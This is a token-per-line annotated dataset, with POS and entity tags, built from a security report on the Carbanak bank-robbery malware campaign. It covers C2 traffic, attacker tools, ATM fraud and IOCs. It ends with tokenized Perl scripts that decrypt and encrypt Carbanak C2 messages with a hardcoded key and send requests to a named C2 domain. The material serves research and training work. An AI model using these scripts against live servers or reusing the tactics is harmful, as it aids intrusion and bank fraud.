locations NNS O O
in IN O O
the DT O O
HTTP NNP O O
request NN O O
. . O O

Example NN O O
of IN O O
a DT O O
typical JJ O O
Carbanak NNP O O
request NN O O
. . O O

Carbanak NNP B-Entity 1
sends VBZ B-Action 2
its PRP$ O O
collected VBN B-Entity 3
monitoring NN I-Entity O
data NNS I-Entity O
to IN B-Modifier 4
its PRP$ O O
C2 NNP B-Entity 5
server NN I-Entity O
. . O O

It PRP B-Entity 1
also RB O O
receives VBZ B-Action 2
commands VBZ B-Entity 3
. . O O

The DT O O
commands NNS O O
are VBP O O
compared VBN O O
with IN O O
a DT O O
hash NN O O
table NN O O
; : O O
if IN O O
there EX O O
is VBZ O O
a DT O O
match NN O O
Carbanak NNP O O
performs VBZ O O
the DT O O
associated VBN O O
action NN O O
. . O O

In IN O O
order NN O O
to TO O O
render VB O O
the DT O O
malware NN O O
less RBR O O
suspicious JJ O O
, , O O
the DT O O
latest JJS O O
Carbanak NNP O O
samples NNS O O
are VBP O O
digitally RB O O
signed VBN O O
. . O O

Known VBN O O
samples NNS O O
of IN O O
Carbanak NNP O O
have VBP O O
been VBN O O
uploaded JJ O O
to IN O O
VirusTotal NNP O O
from IN O O
the DT O O
following VBG O O
locations NNS O O
. . O O

Known JJ O O
exploits NNS O O
that WDT O O
download VBP O O
Carbanak NNP O O
have VBP O O
been VBN O O
uploaded JJ O O
to IN O O
VirusTotal NNP O O
mostly RB O O
from IN O O
Russia NNP O O
. . O O

According VBG O O
to IN O O
KSN NNP O O
data NNS O O
, , O O
victims NNS O O
are VBP O O
distributed VBN O O
geographically RB O O
as IN O O
follows VBZ O O
. . O O

It PRP O O
is VBZ O O
also RB O O
very RB O O
interesting JJ O O
to TO O O
see VB O O
the DT O O
distribution NN O O
of IN O O
Carbanak NNP O O
submissions NNS O O
to IN O O
VirusTotal NNP O O
. . O O

This DT O O
way NN O O
we PRP O O
can MD O O
identify VB O O
periods NNS O O
when WRB O O
the DT O O
malware NN O O
came VBD O O
to IN O O
the DT O O
attention NN O O
of IN O O
potential JJ O O
victims NNS O O
and CC O O
security NN O O
researchers NNS O O
, , O O
and CC O O
helps VBZ O O
to TO O O
reveal VB O O
peaks NNS O O
in IN O O
the DT O O
group NN O O
's POS O O
activity NN O O
. . O O

Since IN O O
the DT O O
beginning NN O O
of IN O O
this DT O O
case NN O O
, , O O
Kaspersky NNP O O
Lab NNP O O
has VBZ O O
worked VBN O O
in IN O O
cooperation NN O O
with IN O O
the DT O O
LEAs NNS O O
investigating VBG O O
it PRP O O
. . O O

During IN O O
the DT O O
investigation NN O O
LEAs VBZ O O
shared VBN O O
with IN O O
us PRP O O
statistical JJ O O
data NNS O O
from IN O O
their PRP$ O O
research NN O O
that WDT O O
helped VBD O O
us PRP O O
to TO O O
complete VB O O
our PRP$ O O
picture NN O O
of IN O O
the DT O O
campaign NN O O
. . O O

The DT O O
following VBG O O
map NN O O
shows VBZ O O
targets NNS O O
' POS O O
IP NNP O O
addresses NNS O O
found VBD O O
in IN O O
three CD O O
of IN O O
Carbanak NNP O O
's POS O O
Linux NNP O O
servers NNS O O
at IN O O
the DT O O
end NN O O
of IN O O
October NNP O O
2014 CD O O
. . O O

Carbanak NNP O O
uses VBZ O O
different JJ O O
tools NNS O O
on IN O O
infected JJ O O
systems NNS O O
, , O O
each DT O O
one NN O O
with IN O O
a DT O O
different JJ O O
purpose NN O O
. . O O

There EX O O
appears VBZ O O
to TO O O
be VB O O
a DT O O
preference NN O O
for IN O O
the DT O O
Ammyy NNP O O
Admin NNP O O
remote JJ O O
administration NN O O
tool NN O O
for IN O O
remote JJ O O
control NN O O
. . O O

Specifically RB O O
, , O O
the DT O O
attackers NNS O O
have VBP O O
been VBN O O
detected VBN O O
uploading NN O O
: : O O
Ammyy NNP O O
Admin NNP O O
3.5 CD O O
( -LRB- O O
f8cd52b70a11a1fb3f29c6f89ff971ec NN O O
) -RRB- O O
as IN O O
svchost.exe `` O O
It PRP O O
is VBZ O O
believed VBN O O
that IN O O
the DT O O
attackers NNS O O
used VBD O O
this DT O O
remote JJ O O
administration NN O O
tool NN O O
because IN O O
it PRP O O
is VBZ O O
commonly RB O O
whitelisted VBN O O
in IN O O
the DT O O
victims NNS O O
' POS O O
environments NNS O O
as IN O O
a DT O O
result NN O O
of IN O O
being VBG O O
used VBN O O
regularly RB O O
by IN O O
administrators NNS O O
. . O O

In IN O O
another DT O O
instance NN O O
, , O O
a DT B-Entity 1
Secure NNP I-Entity O
Shell NNP I-Entity O
( -LRB- I-Entity O
SSH NNP I-Entity O
) -RRB- I-Entity O
backdoor JJ I-Entity O
was VBD O O
used VBD B-Action 2
to IN B-Modifier 3
communicate VBP O O
with IN B-Entity 4
the DT I-Entity O
C2 NNP I-Entity O
server NN I-Entity O
in IN O O
190.97.165.126 CD O O
( -LRB- O O
operatemesscont.net NN O O
) -RRB- O O
. . O O

This DT O O
indicates VBZ O O
that IN O O
the DT O O
attackers NNS O O
did VBD O O
not RB O O
limit VB O O
themselves PRP O O
to IN O O
Microsoft NNP O O
Windows NNP O O
environments NNS O O
. . O O

In IN O O
this DT O O
case NN O O
, , O O
the DT O O
victim NN O O
used VBD O O
the DT O O
Telnet NNP O O
/ SYM O O
SSH NNP O O
client NN O O
PuTTY NNP O O
to TO O O
connect VB O O
to IN O O
the DT O O
server NN O O
, , O O
and CC O O
the DT B-Entity 1
attackers NNS I-Entity O
recompiled VBD B-Action 2
the DT O O
machine NN B-Entity 3
's POS I-Entity O
SSH NNP I-Entity O
daemon NN I-Entity O
with IN B-Modifier 4
a DT O O
backdoor JJ B-Entity 5
so IN B-Modifier 6
they PRP O O
could MD B-Entity 7
gain VB I-Entity O
direct JJ I-Entity O
access NN I-Entity O
. . O O

Logs NNP O O
for IN O O
these DT O O
tools NNS O O
indicate VBP O O
that IN O O
they PRP O O
were VBD O O
accessed VBN O O
from IN O O
two CD O O
different JJ O O
IPs NNS O O
, , O O
probably RB O O
used VBN O O
by IN O O
the DT O O
attackers NNS O O
, , O O
and CC O O
located VBN O O
in IN O O
Ukraine NNP O O
and CC O O
France NNP O O
. . O O

We PRP O O
have VBP O O
also RB O O
found VBN O O
traces NNS O O
of IN O O
many JJ O O
different JJ O O
tools NNS O O
used VBN O O
by IN O O
the DT O O
attackers NNS O O
inside IN O O
the DT O O
victim NN O O
s POS O O
network NN O O
to TO O O
gain VB O O
control NN O O
of IN O O
additional JJ O O
systems NNS O O
, , O O
such JJ O O
as IN O O
Metasploit NNP O O
, , O O
PsExec NNP O O
or CC O O
Mimikatz NNP O O
. . O O

There EX O O
appear VB O O
to TO O O
be VB O O
four CD O O
distinct JJ O O
types NNS O O
of IN O O
C2 NNP O O
servers NNS O O
. . O O

Server NNP O O
rotation NN O O
occurs VBZ O O
more RBR O O
or CC O O
less RBR O O
on IN O O
a DT O O
biweekly NN O O
basis NN O O
. . O O

For IN O O
a DT O O
complete JJ O O
list NN O O
of IN O O
identified VBN O O
Carbanak NNP O O
servers NNS O O
please UH O O
check VB O O
the DT O O
regularly RB O O
updated VBN O O
Carbanak NNP O O
IOC NNP O O
document NN O O
. . O O

The DT O O
current JJ O O
list NN O O
of IN O O
IOCs NNP O O
is VBZ O O
provided VBN O O
at IN O O
Appendix NNP O O
3 CD O O
in IN O O
his PRP$ O O
document NN O O
. . O O

Some DT O O
of IN O O
these DT O O
C2 NNP O O
servers NNS O O
are VBP O O
responsible JJ O O
for IN O O
dropping VBG O O
Ammyy NNP O O
( -LRB- O O
configuration NN O O
and CC O O
executable JJ O O
files NNS O O
) -RRB- O O
, , O O
the DT O O
KLG NNP O O
plugin NN O O
configuration NN O O
( -LRB- O O
list NN O O
of IN O O
processes NNS O O
to TO O O
monitor VB O O
) -RRB- O O
and CC O O
the DT O O
VNC NNP O O
server NN O O
( -LRB- O O
both CC O O
32 CD O O
and CC O O
64 CD O O
bits NNS O O
to TO O O
be VB O O
injected VBN O O
in IN O O
rundll NN O O
) -RRB- O O
. . O O

In IN O O
one CD O O
of IN O O
the DT O O
observed JJ O O
servers NNS O O
there EX O O
was VBD O O
also RB O O
a DT O O
Metasploit NNP O O
module NN O O
. . O O

Victim NNP O O
systems NNS O O
are VBP O O
catalogued VBN O O
in IN O O
the DT O O
servers NNS O O
' POS O O
databases NNS O O
. . O O

The DT O O
victims NNS O O
belong VBP O O
to IN O O
a DT O O
number NN O O
of IN O O
different JJ O O
communities NNS O O
, , O O
thus RB O O
simplifying VBG O O
administration NN O O
. . O O

In IN O O
all DT O O
, , O O
85 CD O O
different JJ O O
victims NNS O O
belonging VBG O O
to IN O O
seven CD O O
communities NNS O O
were VBD O O
found VBN O O
. . O O

Additionally RB O O
, , O O
the DT O O
malicious JJ O O
servers NNS O O
contain VBP O O
video JJ O O
files NNS O O
that WDT O O
capture VBP O O
a DT O O
victim NN O O
s POS O O
activity NN O O
. . O O

While IN O O
the DT O O
videos NNS O O
are VBP O O
stored VBN O O
using VBG O O
a DT O O
compressed JJ O O
format NN O O
which WDT O O
provides VBZ O O
poor JJ O O
image NN O O
quality NN O O
, , O O
the DT O O
selected VBN O O
format NN O O
minimizes VBZ O O
upload NN O O
bandwith NN O O
and CC O O
is VBZ O O
of IN O O
sufficient JJ O O
quality NN O O
for IN O O
the DT O O
attackers NNS O O
to TO O O
understand VB O O
the DT O O
victims NNS O O
' POS O O
activities NNS O O
. . O O

The DT O O
video NN O O
file NN O O
naming VBG O O
conventions NNS O O
used VBD O O
the DT O O
name NN O O
of IN O O
the DT O O
application NN O O
in IN O O
the DT O O
foreground NN O O
( -LRB- O O
e.g. RB O O
, , O O
Outlook NNP O O
, , O O
Cmd NNP O O
, , O O
etc FW O O
. . O O
) -RRB- O O
and CC O O
only RB O O
recorded VBD O O
user NN O O
activity NN O O
. . O O

This DT O O
helped VBD O O
the DT O O
attackers NNS O O
to IN O O
both DT O O
navigate VBP O O
to IN O O
files NNS O O
of IN O O
interest NN O O
and CC O O
to TO O O
discard VB O O
superfluous JJ O O
files NNS O O
. . O O

Using VBG O O
the DT O O
intelligence NN O O
gained VBN O O
from IN O O
video NN O O
and CC O O
other JJ O O
monitoring NN O O
techniques NNS O O
, , O O
the DT O O
attackers NNS O O
developed VBD O O
an DT O O
operational JJ O O
picture NN O O
of IN O O
the DT O O
victim NN O O
's POS O O
workflow NN O O
, , O O
tooling NN O O
and CC O O
practices NNS O O
. . O O

This DT O O
picture NN O O
helps VBZ O O
the DT O O
attackers NNS O O
to TO O O
deploy VB O O
their PRP$ O O
malicious JJ O O
operations NNS O O
, , O O
for IN O O
example NN O O
. . O O

In IN O O
general JJ O O
, , O O
the DT O O
attackers NNS O O
demonstrated VBD O O
great JJ O O
versatility NN O O
, , O O
using VBG O O
attack NN O O
methodologies NNS O O
best RB O O
suited VBN O O
to IN O O
a DT O O
specific JJ O O
victim NN O O
's POS O O
operational JJ O O
methodology NN O O
. . O O

However RB O O
, , O O
they PRP O O
seemed VBD O O
to TO O O
deliberately RB O O
limit VB O O
the DT O O
amount NN O O
of IN O O
money NN O O
stolen VBN O O
per IN O O
victim NN O O
to IN O O
$ $ O O
10 CD O O
million CD O O
USD NN O O
. . O O

This DT O O
limit NN O O
may MD O O
be VB O O
explained VBN O O
as IN O O
the DT O O
maximum JJ O O
amount NN O O
of IN O O
money NN O O
that WDT O O
can MD O O
be VB O O
transferred VBN O O
via IN O O
mule NN O O
services NNS O O
, , O O
or CC O O
the DT O O
maximum JJ O O
amount NN O O
of IN O O
money NN O O
that WDT O O
is VBZ O O
budgeted VBN O O
in IN O O
banks NNS O O
for IN O O
fraud NN O O
risks NNS O O
in IN O O
order NN O O
to TO O O
minimize VB O O
the DT O O
chances NNS O O
of IN O O
LEAs NNS O O
and CC O O
the DT O O
bank NN O O
s POS O O
anti JJ O O
- `` O O
fraud NN O O
teams NNS O O
from IN O O
doing VBG O O
a DT O O
full JJ O O
blown VBN O O
analysis NN O O
. . O O

Sensitive JJ O O
bank NN O O
documents NNS O O
have VBP O O
be VBN O O
found VBN O O
on IN O O
the DT O O
servers NNS O O
that WDT O O
were VBD O O
controlling VBG O O
Carbanak NNP O O
. . O O

They PRP O O
included VBD O O
classified JJ O O
emails NNS O O
, , O O
manuals NNS O O
, , O O
crypto NN O O
keys NNS O O
, , O O
passwords NNS O O
and CC O O
so RB O O
on RB O O
. . O O

For IN O O
example NN O O
, , O O
the DT O O
file NN O O
in IN O O
the DT O O
above JJ O O
figure NN O O
has VBZ O O
KVC NNP O O
( -LRB- O O
key JJ O O
verification NN O O
codes NNS O O
) -RRB- O O
keys NNS O O
that WDT O O
are VBP O O
used VBN O O
by IN O O
ATMs NNS O O
to TO O O
check VB O O
the DT O O
integrity NN O O
of IN O O
the DT O O
PIN NNP O O
numbers NNS O O
of IN O O
its PRP$ O O
users NNS O O
. . O O

In IN O O
other JJ O O
cases NNS O O
involving VBG O O
ATMs NNS O O
, , O O
the DT O O
criminals NNS O O
were VBD O O
able JJ O O
to TO O O
control VB O O
computers NNS O O
that WDT O O
had VBD O O
access NN O O
to IN O O
the DT O O
internal JJ O O
ATM NNP O O
network NN O O
. . O O

If IN O O
the DT O O
bank NN O O
had VBD O O
enabled VBN O O
remote JJ O O
access NN O O
to IN O O
ATMs NNS O O
, , O O
the DT O O
criminals NNS O O
started VBD O O
using VBG O O
this DT O O
access NN O O
to TO O O
remotely RB O O
withdraw VB O O
cash NN O O
. . O O

Criminals NNS O O
used VBD O O
no DT O O
malware NN O O
to TO O O
operate VB O O
the DT O O
ATM NNP O O
dispenser NN O O
; : O O
instead RB O O
they PRP O O
used VBD O O
standard JJ O O
utilities NNS O O
to TO O O
control VB O O
and CC O O
test VB O O
ATM NNP O O
equipment NN O O
. . O O

Malware NNP O O
targeting VBG O O
the DT O O
finance NN O O
industry NN O O
( -LRB- O O
both DT O O
companies NNS O O
and CC O O
consumers NNS O O
) -RRB- O O
continues VBZ O O
to TO O O
evolve VB O O
. . O O

The DT O O
Carbanak NNP O O
malware NN O O
used VBN O O
in IN O O
the DT O O
on IN O O
- HYPH O O
going VBG O O
campaign NN O O
described VBN O O
in IN O O
this DT O O
report NN O O
has VBZ O O
been VBN O O
very RB O O
successful JJ O O
in IN O O
terms NNS O O
of IN O O
generating VBG O O
revenue NN O O
. . O O

Of IN O O
particular JJ O O
interest NN O O
are VBP O O
the DT O O
attack NN O O
methods NNS O O
, , O O
similar JJ O O
to IN O O
those DT O O
used VBN O O
in IN O O
sophisticated JJ O O
cyber NN O O
- HYPH O O
espionage NN O O
APTs NNS O O
. . O O

As IN O O
such JJ O O
, , O O
they PRP O O
represent VBP O O
a DT O O
new JJ O O
and CC O O
disturbing JJ O O
trend NN O O
in IN O O
the DT O O
cybercrime NN O O
market NN O O
of IN O O
increasing VBG O O
attack NN O O
sophistication NN O O
. . O O

Despite IN O O
increased VBN O O
awareness NN O O
of IN O O
cybercrime NN O O
within IN O O
the DT O O
financial JJ O O
services NNS O O
sector NN O O
, , O O
it PRP O O
appears VBZ O O
that IN O O
spear NN O O
phishing NN O O
attacks NNS O O
and CC O O
old JJ O O
exploits NNS O O
( -LRB- O O
for IN O O
which WDT O O
patches NNS O O
have VBP O O
been VBN O O
disseminated VBN O O
) -RRB- O O
remain VB O O
effective JJ O O
against IN O O
larger JJR O O
companies NNS O O
. . O O

Attackers NNS O O
always RB O O
use VBP O O
this DT O O
minimal JJ O O
effort NN O O
approach NN O O
in IN O O
order NN O O
to TO O O
bypass VB O O
a DT O O
victim NN O O
s POS O O
defenses NNS O O
. . O O

Advanced JJ O O
control NN O O
and CC O O
fraud NN O O
detection NN O O
systems NNS O O
have VBP O O
been VBN O O
used VBN O O
for IN O O
years NNS O O
by IN O O
the DT O O
financial JJ O O
services NNS O O
industry NN O O
. . O O

However RB O O
, , O O
these DT O O
focus VBP O O
on IN O O
fraudulent JJ O O
transactions NNS O O
within IN O O
customer NN O O
accounts VBZ O O
. . O O

The DT O O
Carbanak NNP O O
attackers NNS O O
bypassed VBD O O
these DT O O
protections NNS O O
, , O O
by IN O O
for IN O O
example NN O O
, , O O
using VBG O O
the DT O O
industry NN O O
- HYPH O O
wide JJ O O
funds NNS O O
transfer NN O O
( -LRB- O O
the DT O O
SWIFT NNP O O
network NN O O
) -RRB- O O
, , O O
updating VBG O O
balances NNS O O
of IN O O
account NN O O
holders NNS O O
and CC O O
using VBG O O
disbursement NN O O
mechanisms NNS O O
( -LRB- O O
the DT O O
ATM NNP O O
network NN O O
) -RRB- O O
. . O O

In IN O O
neither DT O O
of IN O O
these DT O O
cases NNS O O
did VBD O O
the DT O O
attackers NNS O O
exploit VBP O O
a DT O O
vulnerability NN O O
within IN O O
the DT O O
service NN O O
. . O O

Instead RB O O
, , O O
they PRP O O
studied VBD O O
the DT O O
victim NN O O
s POS O O
internal JJ O O
procedures NNS O O
and CC O O
pinpointed VBD O O
who WP O O
they PRP O O
should MD O O
impersonate VB O O
locally RB O O
in IN O O
order NN O O
to TO O O
process VB O O
fraudulent JJ O O
transactions NNS O O
through IN O O
the DT O O
aforementioned JJ O O
services NNS O O
. . O O

It PRP O O
is VBZ O O
clear JJ O O
that IN O O
the DT O O
attackers NNS O O
were VBD O O
very RB O O
familiar JJ O O
with IN O O
financial JJ O O
services NNS O O
software NN O O
and CC O O
networks NNS O O
. . O O

As IN O O
part NN O O
of IN O O
an DT O O
automated VBN O O
reconnaissance NN O O
phase NN O O
, , O O
the DT O O
Carbanak NNP O O
malware NN O O
checked VBN O O
victim NN O O
systems NNS O O
for IN O O
the DT O O
presence NN O O
of IN O O
specialized JJ O O
and CC O O
specific JJ O O
banking NN O O
software NN O O
. . O O

Only RB O O
after IN O O
the DT O O
presence NN O O
of IN O O
banking NN O O
systems NNS O O
was VBD O O
confirmed VBN O O
, , O O
were VBD O O
victims NNS O O
further RB O O
exploited VBD O O
. . O O

To IN O O
date NN O O
, , O O
attacks NNS O O
against IN O O
approximately RB O O
300 CD O O
IP NN O O
addresses NNS O O
around IN O O
the DT O O
world NN O O
have VBP O O
been VBN O O
observed VBN O O
on IN O O
analyzed VBN O O
C2s NNP O O
. . O O

It PRP O O
is VBZ O O
possible JJ O O
that IN O O
these DT O O
attacks NNS O O
were VBD O O
coordinated VBN O O
to TO O O
maximize VB O O
returns NNS O O
prior RB O O
to IN O O
industry NN O O
- HYPH O O
wide JJ O O
information NN O O
sharing NN O O
and CC O O
the DT O O
implementation NN O O
of IN O O
countermeasures NNS O O
. . O O

Existing VBG O O
telemetry NN O O
indicates VBZ O O
that IN O O
the DT O O
Carbanak NNP O O
attackers NNS O O
are VBP O O
trying VBG O O
to TO O O
expand VB O O
operations NNS O O
to IN O O
other JJ O O
Baltic NNP O O
and CC O O
Central NNP O O
Europe NNP O O
countries NNS O O
, , O O
the DT O O
Middle NNP O O
East NNP O O
, , O O
Asia NNP O O
and CC O O
Africa NNP O O
. . O O

Carbanak NNP O O
may MD O O
be VB O O
responsible JJ O O
for IN O O
losses NNS O O
as RB O O
high JJ O O
as IN O O
$ $ O O
1 CD O O
billion CD O O
USD NN O O
. . O O

We PRP O O
believe VBP O O
that IN O O
the DT O O
Carbanak NNP O O
campaign NN O O
is VBZ O O
a DT O O
clear JJ O O
indicator NN O O
of IN O O
a DT O O
new JJ O O
era NN O O
in IN O O
cybercrime NN O O
in IN O O
which WDT O O
criminals NNS O O
use VBP O O
APT NN O O
techniques NNS O O
directly RB O O
against IN O O
the DT O O
financial JJ O O
industry NN O O
instead RB O O
of IN O O
through IN O O
its PRP$ O O
customers NNS O O
. . O O

APTs NNS O O
are VBP O O
not RB O O
only RB O O
for IN O O
stealing VBG O O
information NN O O
anymore RB O O
. . O O

Decryptor NN O O
# NN O O
! . O O
/usr . O O
/ SYM O O
bin NN O O
/ SYM O O
perl NN O O
-w NN O O
# NN O O
Work VB O O
with IN O O
Carbanak NNP O O
c2 JJ O O
use VB O O
strict JJ O O
; : O O
use VB O O
warnings NNS O O
; : O O
use VB O O
Crypt::CBC NNP O O
; : O O
use VB O O
Crypt::Cipher::RC2 NNP O O
; : O O
use VB O O
MIME::Base64 NNP O O
; : O O
use VB O O
LWP::Simple NNP O O
; : O O
# NFP O O
my PRP$ O O
$ HYPH O O
c2 NN O O
= SYM O O
" `` O O
worldnewsonline.pw ADD O O
" '' O O
; : O O
# -LRB- O O
my PRP$ O O
$ $ O O
reguest NN O O
= SYM O O
" `` O O
1234567890123456 CD O O
" '' O O
; : O O
my PRP$ O O
$ $ O O
reguest_was NN O O
= SYM O O
" `` O O
JybDHkfWGURJPuWeUpPMX NNP O O
/ SYM O O
ca9BThbDim0Hdk/9YzkJS7m8a19tz NNP O O
QwZxo1vvQ NNP O O
/ SYM O O
r/7SHJcCm4tdpZGp.dmDwKf RB O O
MjpWBM18eX8VUiimyaUZMGoClZ6eShS9tLCK SYM O O
tuHvlMQ3Dc26y90FbPIua.7LGHGZCBPj.vd08DUENC5oAE4V NN O O
fyUz.shtml NN O O
" '' O O
; : O O
$ $ O O
reguest_was VBD O O
= SYM O O
~ NFP O O
tr/\/\=\&\?//d LS O O
; : O O
my PRP$ O O
$ HYPH O O
replace VB O O
= SYM O O
" '' O O
" `` O O
; : O O
my PRP$ O O
$ HYPH O O
find=".shtml NN O O
" '' O O
; : O O
$ $ O O
reguest_was VBD O O
= SYM O O
~ NFP O O
s/\Q$find\E//g NN O O
; : O O
$ $ O O
reguest_was VBD O O
= SYM O O
~ NFP O O
s/-/+/g NN O O
; : O O
$ $ O O
reguest_was VBD O O
= SYM O O
~ NFP O O
s/\./\//g LS O O
; : O O
print VB O O
" '' O O
$ $ O O
reguest_was\n NN O O
" '' O O
; : O O
my PRP$ O O
$ HYPH O O
iv NN O O
= SYM O O
substr VB O O
$ HYPH O O
reguest_was,0,8 NN O O
; : O O
$ $ O O
reguest_was VBD O O
= CD O O
substr NN O O
$ HYPH O O
reguest_was,8 NN O O
; : O O
my PRP$ O O
$ HYPH O O
base64_decoded1 NN O O
= SYM O O
decode_base64("$reguest_was FW O O
" '' O O
) -RRB- O O
; : O O
print NN O O
" '' O O
$ $ O O
base64_decoded1\n NN O O
" '' O O
; : O O
my PRP$ O O
$ HYPH O O
length NN O O
= SYM O O
length($base64_decoded1 LS O O
) -RRB- O O
; : O O
print NN O O
" '' O O
length NN O O
is VBZ O O
: : O O
$ $ O O
length\n NN O O
" '' O O
; : O O
print VB O O
" `` O O
iv NN O O
is VBZ O O
: : O O
$ $ O O
iv\n NN O O
" '' O O
; : O O
print VB O O
" `` O O
req NN O O
is VBZ O O
: : O O
$ $ O O
reguest_was\n NN O O
" '' O O
; : O O
my PRP$ O O
$ HYPH O O
base64_decoded VBN O O
= NN O O
" `` O O
$ $ O O
{ -LRB- O O
base64_decoded1 NN O O
} -RRB- O O
" `` O O
; : O O
my PRP$ O O
$ HYPH O O
key NN O O
= NN O O
" `` O O
vfDGbiwmiqdN6E2N NN O O
" '' O O
; : O O
# -LRB- O O
my PRP$ O O
$ $ O O
key NN O O
= SYM O O
" `` O O
1234567812345678 CD O O
" '' O O
; : O O
my PRP$ O O
$ $ O O
cipher NN O O
= SYM O O
Crypt::CBC->new FW O O
( -LRB- O O
-cipher=>'Cipher::RC2 FW O O
' '' O O
, , O O
-header=>'none NN O O
' '' O O
, , O O
-literal_key=>1 XX O O
, , O O
-key=>$key NN O O
, , O O
– . O O
keysize=>16 NN O O
, , O O
-iv=>$iv LS O O
) -RRB- O O
; : O O
my PRP$ O O
$ HYPH O O
plaintext NN O O
= SYM O O
$ $ O O
cipher->decrypt($base64_decoded LS O O
) -RRB- O O
; : O O
print NN O O
" '' O O
Decode:\ NNP O O
n$plaintext\n NN O O
" '' O O
; : O O
# , O O
Decrypt NNP O O
is VBZ O O
# $ O O
HWUMRbvuwKQCrkOhuckIXpdFgtd|new0878802c8004333a3|data NNS O O
= SYM O O
listprocess|pro JJ O O
cess NN O O
= SYM O O
svchost.exe|idproce FW O O
ss=4294967295|lBHReFDRDfYG NN O O
# NFP O O
my PRP$ O O
$ $ O O
url NN O O
= SYM O O
" `` O O
http://$c2/$base64_encoded ADD O O
" '' O O
; : O O
# -RRB- O O
print VB O O
$ HYPH O O
url NN O O
; : O O
# NFP O O
my PRP$ O O
$ JJ O O
contents NNS O O
= SYM O O
get($url LS O O
) -RRB- O O
; : O O
# NFP O O
print VB O O
$ HYPH O O
contents NNS O O
; : O O
Encryptor NN O O
# NN O O
! . O O
/usr . O O
/ SYM O O
bin NN O O
/ SYM O O
perl NN O O
-w NN O O
# NN O O
Decrypt NNP O O
Carbanak NNP O O
c2 NNP O O
responce NN O O
use VB O O
strict JJ O O
; : O O
use VB O O
warnings NNS O O
; : O O
use VB O O
Crypt::CBC NNP O O
; : O O
use VB O O
Crypt::Cipher::RC2 NNP O O
; : O O
use VB O O
MIME::Base64 NNP O O
; : O O
use VB O O
LWP::Simple NNP O O
; : O O
my PRP$ O O
$ HYPH O O
c2 NN O O
= SYM O O
" `` O O
worldnewsonline.pw ADD O O
" '' O O
; : O O
my PRP$ O O
$ HYPH O O
reguest NN O O
= SYM O O
" '' O O
HWUMRbvuwKQCrkOhuckIXpdFgtd|new0878802c8004333a3|data NN O O
= SYM O O
listprocess|pro JJ O O
cess NN O O
= SYM O O
svchost.exe|idproces NNS O O
s=4294967295|lBHReFDRDfYG JJ O O
" `` O O
; : O O
my PRP$ O O
$ HYPH O O
iv NN O O
= SYM O O
" `` O O
JybDHkfW NNP O O
" '' O O
; , O O
# NN O O
should MD O O
be VB O O
random JJ O O
my PRP$ O O
$ $ O O
key NN O O
= SYM O O
" `` O O
vfDGbiwmiqdN6E2N NN O O
" '' O O
; : O O
my PRP$ O O
$ $ O O
cipher NN O O
= SYM O O
Crypt::CBC->new FW O O
( -LRB- O O
-cipher=>'Cipher::RC2 FW O O
' '' O O
, , O O
-header=>'none NN O O
' '' O O
, , O O
-literal_key=>1 XX O O
, , O O
-key=>$key NN O O
, , O O
– . O O
keysize=>16 NN O O
, , O O
-iv=>$iv LS O O
) -RRB- O O
; : O O
my PRP$ O O
$ HYPH O O
ciphertext NN O O
= SYM O O
$ $ O O
cipher->encrypt($reguest JJS O O
) -RRB- O O
; : O O
my PRP$ O O
$ HYPH O O
base64_encoded VBN O O
= SYM O O
encode_base64("$ciphertext FW O O
" '' O O
) -RRB- O O
; : O O
$ $ O O
base64_encoded VBD O O
= SYM O O
~ NFP O O
s/\x0a//g NN O O
; : O O
$ $ O O
base64_encoded VBD O O
= SYM O O
~ NFP O O
s/\//\./g NN O O
; : O O
$ $ O O
base64_encoded VBD O O
= SYM O O
~ NFP O O
s/\+/-/g LS O O
; : O O
my PRP$ O O
$ HYPH O O
base64_encoded_ex NN O O
= : O O
" `` O O
$ $ O O
{ -LRB- O O
iv}${base64_encoded}.php NN O O
" '' O O
; : O O
my PRP$ O O
$ HYPH O O
url NN O O
= SYM O O
" `` O O
http://$c2/${base64_encoded_ex ADD O O
} -RRB- O O
" '' O O
; : O O
print VB O O
$ HYPH O O
url NN O O
; : O O
# . O O
http://worldnewsonline.pw/ ADD O O
GURJPuWeUpPMXca9BThbDim0Hdk9YzkJS7m8a19tzQwZxo1vvQr7SHJcCm4tdp NNP O O
ZGp NNS O O
. . O O

dmDwKfMjpW.BM18eX8VUiimyaUZMGoClZ6eShS9tLCKtuHvlMQ3Dc26y90FbPIua.7LGHG NN O O
ZCBPj.vd08D SYM O O
UENC5o NN O O
. . O O
AE4VfyUz NFP O O
.. . O O
php| NFP O O
my PRP$ O O
$ JJ O O
contents NNS O O
= SYM O O
get($url LS O O
) -RRB- O O
; : O O
print VB O O
$ HYPH O O
contents NNS O O
; : O O
Decrypt NNP O O
Files NNPS O O
from IN O O
CnC NN O O
# NN O O
! . O O
/usr . O O
/ SYM O O
bin NN O O
/ SYM O O
perl NN O O
-w NN O O
# NN O O
Decrypt NNP O O
Files NNPS O O
from IN O O
sended VBN O O
from IN O O
c2 JJ O O
use VB O O
strict JJ O O
; : O O
use VB O O
warnings NNS O O
; : O O
use VB O O
Crypt::CBC NNP O O
; : O O
use VB O O
Crypt::Cipher::RC2 NNP O O
; : O O
use VB O O
MIME::Base64 NNP O O
; : O O
use VB O O
LWP::Simple NNP O O
; : O O
my PRP$ O O
$ HYPH O O
file=$ARGV[0 NN O O
] -RRB- O O
; : O O
open(DATA CD O O
, , O O
" '' O O
< XX O O
$ $ O O
file NN O O
" '' O O
) -RRB- O O
; : O O
open(DATA1 CD O O
, , O O
" '' O O
< XX O O
$ $ O O
file NN O O
" '' O O
) -RRB- O O
; : O O
open(DATA2 CD O O
, , O O
" '' O O
< XX O O
$ $ O O
file NN O O
" '' O O
) -RRB- O O
; : O O
binmode(DATA LS O O
) -RRB- O O
; : O O
binmode(DATA1 LS O O
) -RRB- O O
; : O O
binmode(DATA2 LS O O
) -RRB- O O
; , O O
my PRP$ O O
( -LRB- O O
$ $ O O
data NNS O O
, , O O
$ $ O O
n CC O O
, , O O
$ $ O O
offset VB O O
) -RRB- O O
; , O O
while IN O O
( -LRB- O O
( -LRB- O O
$ $ O O
n CD O O
= CD O O
read VBN O O
DATA NNP O O
, , O O
$ NNP O O
data NNS O O
, , O O
1 CD O O
, , O O
$ : O O
offset VB O O
) -RRB- O O
! . O O
= SYM O O
0 CD O O
) -RRB- O O
{ -LRB- O O
$ $ O O
offset VBN O O
+ SYM O O
= SYM O O
$ HYPH O O
n RB O O
; : O O
} -RRB- O O
my PRP$ O O
$ JJ O O
length NN O O
= SYM O O
$ $ O O
offset VB O O
; : O O
my PRP$ O O
$ HYPH O O
iv_len NN O O
= NFP O O
read VB O O
DATA1 NNP O O
, , O O
my PRP$ O O
$ $ O O
iv NN O O
, , O O
8 CD O O
, , O O
0 CD O O
; : O O
